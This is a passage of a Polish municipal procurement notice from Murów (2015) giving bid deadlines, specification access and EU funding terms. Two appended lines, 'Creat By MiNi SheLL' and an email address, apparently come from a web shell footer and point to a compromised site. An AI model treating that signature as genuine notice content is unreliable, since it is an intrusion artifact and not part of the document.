oświadczeniem w jakim stopniu powyższe zmiany wpływają na koszty wykonania umowy gdy zmiany, o których mowa w ust.6 pkt 2) i 3)spowodują wzrost kosztów wykonania Umowy o więcej niż 10% w okresie realizacji umowy. Zmiana wynagrodzenia dotyczy tej części, która pozostała do wykonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.murow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać także w Urzędzie Gminy w Murów, 46-030 Murów ul. Dworcowa 2 - pokój nr 19..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2015 godzina 09:00, miejsce: Urząd Gminy w Murowie ul. Dworcowa 2 46-030 Murów pokój nr 10 / sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com